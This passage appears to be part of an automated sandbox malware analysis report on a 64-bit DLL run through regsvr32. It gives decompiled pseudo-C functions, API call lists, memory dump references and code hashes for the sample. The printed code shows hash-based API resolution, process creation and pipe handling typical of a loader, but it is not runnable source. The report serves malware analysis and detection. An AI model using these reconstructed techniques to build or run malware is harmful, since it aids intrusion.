				 *((long long*)(_t54 + 0x20)) = __rdi;
				_t57 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x20)) == 0) goto 0x80007a57;
				E00000001180008308(SetEvent(_t86), _t35,  *0x8000d4a0, __rcx, __rcx + 0x10, __rbp);
				if ( *((long long*)(_t57 + 8)) == 0) goto 0x800079ba;
				WaitForSingleObject(??, ??);
				CloseHandle(??);
				if ( *((intOrPtr*)(_t57 + 0x28)) == 0) goto 0x800079c9;
				_t29 = CloseHandle(??);
				EnterCriticalSection(??);
				_t74 = _t57 + 0x88;
				_t77 =  *_t74;
				goto 0x800079eb;
				E00000001180008308(_t29, _t35,  *0x8000d4a0, _t57, _t77 - 0x10, __rbp);
				if ( *_t77 != _t74) goto 0x800079df;
				LeaveCriticalSection(??);
				goto 0x80007a09;
				Sleep(??);
				if ( *_t74 != _t74) goto 0x80007a01;
				if ( *((intOrPtr*)(_t57 + 0x40)) == 0) goto 0x80007a26;
				Sleep(??);
				r11d =  *((intOrPtr*)(_t57 + 0x40));
				if (r11d != 0) goto 0x80007a15;
				if ( *((intOrPtr*)(_t57 + 0x30)) == 0) goto 0x80007a35;
				CloseHandle(??);
				if ( *((intOrPtr*)(_t57 + 0x20)) == 0) goto 0x80007a44;
				CloseHandle(??);
				if ( *_t57 == 0) goto 0x80007a57;
				_t34 = HeapFree(??, ??, ??);
				DeleteCriticalSection(??);
				return _t34;
			}

0x180007953
0x180007959
0x18000795c
0x180007960
0x180007964
0x180007968
0x180007979
0x180007987
0x180007997
0x1800079a1
0x1800079aa
0x1800079b4
0x1800079c1
0x1800079c3
0x1800079cd
0x1800079d3
0x1800079da
0x1800079dd
0x1800079e6
0x1800079ee
0x1800079f4
0x1800079ff
0x180007a03
0x180007a0c
0x180007a13
0x180007a17
0x180007a1d
0x180007a24
0x180007a2d
0x180007a2f
0x180007a3c
0x180007a3e
0x180007a4a
0x180007a51
0x180007a5b
0x180007a7b

APIs

SetEvent.KERNEL32 ref: 000000018000798D
WaitForSingleObject.KERNEL32 ref: 00000001800079AA
CloseHandle.KERNEL32 ref: 00000001800079B4
CloseHandle.KERNEL32 ref: 00000001800079C3
EnterCriticalSection.KERNEL32 ref: 00000001800079CD
LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Sleep.KERNEL32 ref: 0000000180007A03
Sleep.KERNEL32 ref: 0000000180007A17
CloseHandle.KERNEL32 ref: 0000000180007A2F
CloseHandle.KERNEL32 ref: 0000000180007A3E
HeapFree.KERNEL32 ref: 0000000180007A51
DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
String ID:
API String ID: 2177250193-0
Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A6EC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000018000A783
LoadLibraryA.KERNEL32 ref: 000000018000A829
GetLastError.KERNEL32 ref: 000000018000A837
RaiseException.KERNEL32 ref: 000000018000A87F

Strings

H, xrefs: 000000018000A710

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: H
API String ID: 948315288-2852464175
Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000431C Relevance: 16.7, APIs: 11, Instructions: 174
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0000000118000431C(void* __ecx, void* __edi, signed long long __rax, long long __rbx, intOrPtr* __rcx, void* __rdx) {
				void* __rdi;
				void* __rsi;
				long _t45;
				void* _t50;
				long _t75;
				signed long long _t123;
				signed long long _t124;
				intOrPtr* _t126;
				void* _t154;
				int _t161;
				void* _t165;
				long long _t168;
				void* _t170;
				void* _t171;
				void* _t178;
				void* _t180;
				void* _t182;

				_t123 = __rax;
				 *((long long*)(_t170 + 0x18)) = __rbx;
				 *((long long*)(_t170 + 0x20)) = _t168;
				_t171 = _t170 - 0x40;
				_t166 =  *0x8000d4a0;
				_t126 = __rcx;
				r14d = 0;
				_t45 = WaitForSingleObject(_t182);
				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
				E0000000118000459C(_t45, 0xb74c62f4,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t123 == _t182) goto 0x80004372;
				 *_t123();
				_t154 = _t126 + 0x4c;
				r8d = 0x10;
				E0000000118000459C(memcpy(_t180, _t178, _t161), 0x176fdd38,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t123 == _t182) goto 0x800043a9;
				_t10 = _t154 + 1; // 0x2
				_t11 = _t154 + 5; // 0x6
				r8d = _t11;
				_t50 =  *_t123();
				goto 0x800043ad;
				_t124 = _t123 | 0xffffffff;
				 *(_t126 + 0x10) = _t124;
				if (_t124 == 0xffffffff) goto 0x8000444d;
				E0000000118000459C(_t50, 0x66454c9c,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t124 == _t182) goto 0x800043e0;
				r8d = 0x10;
				 *_t124();
				goto 0x800043e3;
				if (r14d != r14d) goto 0x80004435;
				r8d = 1;
				 *(_t171 + 0x70) = r14w;
				if (E00000001180008150(_t10, __edi, _t126,  *(_t126 + 0x10),  *_t126, _t161,  *0x8000d4a0, _t168, _t171 + 0x70, _t165) != r14d) goto 0x80004442;
				SetEvent(??);
				r9d =  *(_t171 + 0x70) & 0x0000ffff;
				if (E000000011800091F8(_t126, _t126,  *(_t126 + 0x10), _t166, _t168) != r14d) goto 0x80004442;
				goto 0x8000447e;
				if (GetLastError() == r14d) goto 0x80004481;
				E00000001180008308(_t57, _t10, _t124, _t126, _t126 + 0x10, _t168);
				goto 0x80004455;
				if (GetLastError() == r14d) goto 0x80004481;
				if (r14d + 1 !=  *((intOrPtr*)(_t126 + 0x44))) goto 0x80004481;
				ResetEvent(??);
				WaitForSingleObject(??, ??);
				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
				goto 0x80004570;
				E0000000118000459C(_t62, 0x544646d0,  *((intOrPtr*)(_t126 + 0x20)));
				if (_t124 == _t182) goto 0x800044be;
				r8d = 0x10;
				 *_t124();
				goto 0x800044c1;
				if (r14d != r14d) goto 0x80004568;
				 *((intOrPtr*)(_t171 + 0x78)) = 0x10;
				E0000000118000459C(r14d, 0xd0aed27e,  *((intOrPtr*)(_t166 + 0x30)));
				if (_t124 == _t182) goto 0x800044f2;
				 *_t124();
				goto 0x800044f5;
				if (r14d != r14d) goto 0x80004568;
				E0000000118000459C(SetEvent(??), 0xa1aa58b7,  *((intOrPtr*)(_t166 + 0x30)));
				if (_t124 == _t182) goto 0x8000452c;
				 *_t124();
				goto 0x80004530;
				if ((_t124 | 0xffffffff) == 0xffffffff) goto 0x80004568;
				r9d = 0;
				if (E000000011800091F8(_t126, _t126, _t124 | 0xffffffff, _t166, _t168) == r14d) goto 0x80004504;
				E0000000118000459C(_t72, 0xb74c62f4,  *((intOrPtr*)(_t166 + 0x30)));
				if (_t124 == _t182) goto 0x80004504;
				 *_t124();
				goto 0x80004504;
				_t75 = GetLastError();
				ReleaseMutex(??);
				asm("lock add dword [esi+0x38], 0xffffffff");
				return _t75;
			}

0x18000431c
0x18000431c
0x180004321
0x18000432e
0x180004332
0x180004339
0x180004340
0x180004349
0x180004357
0x180004362
0x18000436a
0x180004370
0x180004372
0x18000437b
0x18000438f
0x180004397
0x18000439e
0x1800043a1
0x1800043a1
0x1800043a5
0x1800043a7
0x1800043a9
0x1800043ad
0x1800043b5
0x1800043c4
0x1800043cc
0x1800043d6
0x1800043dc
0x1800043de
0x1800043e6
0x1800043f4
0x1800043fa
0x18000440a
0x180004410
0x180004416
0x180004431
0x180004433
0x180004440
0x180004446
0x18000444b
0x180004458
0x18000445f
0x180004465
0x180004478
0x180004492
0x180004498
0x1800044a2
0x1800044aa
0x1800044b4
0x1800044ba
0x1800044bc
0x1800044c4
0x1800044d3
0x1800044db
0x1800044e3
0x1800044ee
0x1800044f0
0x1800044f8
0x18000450d
0x180004515
0x180004525
0x18000452a
0x180004534
0x18000453b
0x18000454c
0x180004557
0x18000455f
0x180004564
0x180004566
0x180004568
0x180004574
0x18000457a
0x180004599

APIs

WaitForSingleObject.KERNEL32 ref: 0000000180004349
memcpy.NTDLL ref: 0000000180004381
SetEvent.KERNEL32 ref: 0000000180004410
GetLastError.KERNEL32 ref: 0000000180004435
ResetEvent.KERNEL32 ref: 0000000180004465
WaitForSingleObject.KERNEL32 ref: 0000000180004478
WaitForSingleObject.KERNEL32 ref: 0000000180004487
SetEvent.KERNEL32 ref: 00000001800044FE
GetLastError.KERNEL32 ref: 0000000180004568
ReleaseMutex.KERNEL32 ref: 0000000180004574

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
String ID:
API String ID: 1434584367-0
Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007444 Relevance: 16.6, APIs: 11, Instructions: 146memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,00000000,0000000180006222), ref: 0000000180007489
_snprintf.NTDLL ref: 00000001800074BB
lstrlenA.KERNEL32 ref: 00000001800074D7
HeapAlloc.KERNEL32 ref: 000000018000750F
_snprintf.NTDLL ref: 0000000180007540
HeapAlloc.KERNEL32 ref: 000000018000754F
_snprintf.NTDLL ref: 00000001800075B7
memcpy.NTDLL ref: 00000001800075CB
memcpy.NTDLL ref: 00000001800075E2
_snprintf.NTDLL ref: 0000000180007620
HeapFree.KERNEL32 ref: 0000000180007653

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
String ID:
API String ID: 1448584724-0
Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006754 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180006786

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

CreateProcessW.KERNEL32 ref: 00000001800067F7
WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
TerminateProcess.KERNEL32 ref: 0000000180006844
CloseHandle.KERNEL32 ref: 000000018000684F
CloseHandle.KERNEL32 ref: 000000018000685A
GetLastError.KERNEL32 ref: 0000000180006862
HeapFree.KERNEL32 ref: 0000000180006877

Strings

h, xrefs: 00000001800067A1

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
String ID: h
API String ID: 3316326719-2439710439
Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000970C Relevance: 15.2, APIs: 12, Instructions: 177
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0000000118000970C(void* __ebx, void* __ecx, void* __ebp, void* __esp, void* __fp0, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
				void* __rdi;
				signed int _t56;
				int _t61;
				intOrPtr _t78;
				intOrPtr _t79;
				struct _CRITICAL_SECTION* _t125;
				long long _t128;
				intOrPtr* _t154;
				struct _CRITICAL_SECTION* _t158;
				long long _t165;
				intOrPtr* _t166;
				void* _t169;
				void* _t170;
				void* _t172;
				signed long long _t181;
				struct _CRITICAL_SECTION* _t183;
				struct _CRITICAL_SECTION* _t187;
				void* _t190;
				void* _t193;
				void* _t194;

				_t181 = __r11;
				_t172 = __r8;
				_t130 = __rbx;
				 *((long long*)(_t169 + 0x10)) = __rbx;
				 *((long long*)(_t169 + 0x18)) = _t165;
				 *((long long*)(_t169 + 0x20)) = __rsi;
				_t170 = _t169 - 0x60;
				_t163 =  *__rcx;
				r14d = r8d;
				_t194 = __rdx;
				_t166 = __rcx;
				 *((long long*)(_t170 + 0x58)) =  *__rcx;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
				E000000011800045E8(__ebx, __ecx, __rbx, __rcx,  *__rcx, __rcx, _t193, _t190);
				EnterCriticalSection(_t187);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(_t183);
				r11d =  *(_t166 + 0x70) & 0x000000ff;
				_t56 =  *(_t166 + 0x50) & 0x000000ff;
				if (r11d - _t56 >= 0) goto 0x800097e8;
				_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x48)) + _t181 * 8));
				_t78 =  *_t154;
				if (_t78 == dil) goto 0x800097aa;
				if (_t78 == 0x2f) goto 0x800097a5;
				_t79 =  *((intOrPtr*)(_t154 + 1));
				if (_t79 != dil) goto 0x80009796;
				if (_t79 != dil) goto 0x800097ad;
				_t125 = _t158;
				if (_t125 == _t158) goto 0x800097c5;
				if ( *((char*)(_t125 - 1)) != 0x3a) goto 0x800097c5;
				if ( *((char*)(_t125 + 1)) != 0x2f) goto 0x800097c5;
				E00000001180001C00(_t130, _t181 + _t154, _t154, _t158, _t163, _t166);
				if (_t125 == _t158) goto 0x800097e8;
				 *(_t170 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
				asm("lock add dword [esi+0x40], 0xffffffff");
				if (_t125 == _t158) goto 0x8000996c;
				r9d = 0;
				r8d = r14d;
				 *((long long*)(_t170 + 0x38)) = _t170 + 0x40;
				 *((long long*)(_t170 + 0x30)) = _t170 + 0x48;
				_t24 = _t170 + 0x50; // 0x32
				_t128 = _t24;
				 *((long long*)(_t170 + 0x28)) = _t128;
				 *((intOrPtr*)(_t170 + 0x20)) = 0;
				if (E00000001180006108(_t130, _t166, __rdx, _t172) != 0) goto 0x8000995c;
				_t191 =  *_t166;
				EnterCriticalSection(_t158);
				asm("lock inc ecx");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t166 + 0x18)) == _t158) goto 0x8000986b;
				E00000001180001C00(_t130,  *((intOrPtr*)(_t166 + 0x18)), __rdx, _t158, _t163, _t166);
				goto 0x80009873;
				asm("lock inc ecx");
				if ( *(_t170 + 0x90) == _t158) goto 0x8000993c;
				r14d = lstrlenA(??);
				_t61 = lstrlenA(??);
				_t32 = _t191 + 2; // 0x2
				r15d = _t61;
				E00000001180001C00( *(_t170 + 0x90), _t125, __rdx, _t158, _t163, _t166);
				if (_t128 == _t158) goto 0x8000992e;
				_t33 = _t194 + 1; // 0x1
				r8d = _t33;
				 *((char*)( *_t166 + _t128)) = 0x2f;
				memcpy(??, ??, ??);
				dil =  *(_t170 + 0x90) != 0;
				 *((intOrPtr*)(_t170 + 0x38)) = 2;
				 *((long long*)(_t170 + 0x30)) =  *((intOrPtr*)(_t170 + 0xb8));
				 *((long long*)(_t170 + 0x28)) =  *((intOrPtr*)(_t170 + 0xb0));
				 *((intOrPtr*)(_t170 + 0x20)) =  *((intOrPtr*)(_t170 + 0x40));
				if (E000000011800088B4(_t56 + 2, _t56 + 2 == 8, _t128 + _t32, __ebp, __esp, __fp0,  *(_t170 + 0x90),  *((intOrPtr*)(_t170 + 0x58)), _t128,  *((intOrPtr*)(_t170 + 0xb0)), _t163, _t128,  *((intOrPtr*)(_t170 + 0x50)),  *((intOrPtr*)(_t170 + 0x48)), _t181) != 0x10d2) goto 0x80009920;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009971;
				return 8;
			}

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,0000000180005069), ref: 000000018000975C
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 000000018000976B
EnterCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009840
LeaveCriticalSection.KERNEL32(?,0000000180005069), ref: 0000000180009850
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009885
lstrlenA.KERNEL32(?,0000000180005069), ref: 0000000180009891
memcpy.NTDLL(?,0000000180005069), ref: 00000001800098C0

Part of subcall function 00000001800045E8: GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
Part of subcall function 00000001800045E8: LeaveCriticalSection.KERNEL32 ref: 0000000180004653

Part of subcall function 00000001800088B4: memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180009910,?,0000000180005069), ref: 00000001800088F9

HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009928
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009936
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009946
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009956
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009964

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
String ID:
API String ID: 4119546182-0
Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002F24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112memorypipeCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000180002F58
memset.NTDLL ref: 0000000180002F7E
CreatePipe.KERNEL32 ref: 0000000180002FB4
GetLastError.KERNEL32 ref: 0000000180002FBE

Strings

.RK, xrefs: 000000018000304E

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocCreateErrorHeapLastPipememset
String ID: .RK
API String ID: 2695650488-3354657194
Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005600 Relevance: 10.6, APIs: 7, Instructions: 81memorystringtimeCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0000000180005634
HeapAlloc.KERNEL32 ref: 0000000180005648
GetSystemTime.KERNEL32 ref: 000000018000565F
_snprintf.NTDLL ref: 00000001800056B6
EnterCriticalSection.KERNEL32 ref: 00000001800056C2
LeaveCriticalSection.KERNEL32 ref: 000000018000571B
HeapFree.KERNEL32 ref: 0000000180005729

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
String ID:
API String ID: 2518601019-0
Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 10.6, APIs: 7, Instructions: 79memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018000104A
GetFileSize.KERNEL32 ref: 000000018000105E
HeapAlloc.KERNEL32 ref: 000000018000107A
ReadFile.KERNEL32 ref: 000000018000109F
GetLastError.KERNEL32 ref: 00000001800010C8
CloseHandle.KERNEL32 ref: 00000001800010D9
HeapFree.KERNEL32 ref: 00000001800010F0

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
String ID:
API String ID: 4260168601-0
Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180001DD1

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

memcpy.NTDLL ref: 0000000180001E66
CreateProcessW.KERNEL32 ref: 0000000180001EA4
GetLastError.KERNEL32 ref: 0000000180001EAE
HeapFree.KERNEL32 ref: 0000000180001EBE

Strings

h, xrefs: 0000000180001E1C

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
String ID: h
API String ID: 1962595928-2439710439
Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007A7C Relevance: 10.5, APIs: 7, Instructions: 34COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32 ref: 0000000180007A9F
CloseHandle.KERNEL32 ref: 0000000180007AA9
CloseHandle.KERNEL32 ref: 0000000180007AB3
CloseHandle.KERNEL32 ref: 0000000180007AC2
CloseHandle.KERNEL32 ref: 0000000180007ACC
CloseHandle.KERNEL32 ref: 0000000180007ADB
CloseHandle.KERNEL32 ref: 0000000180007AE5

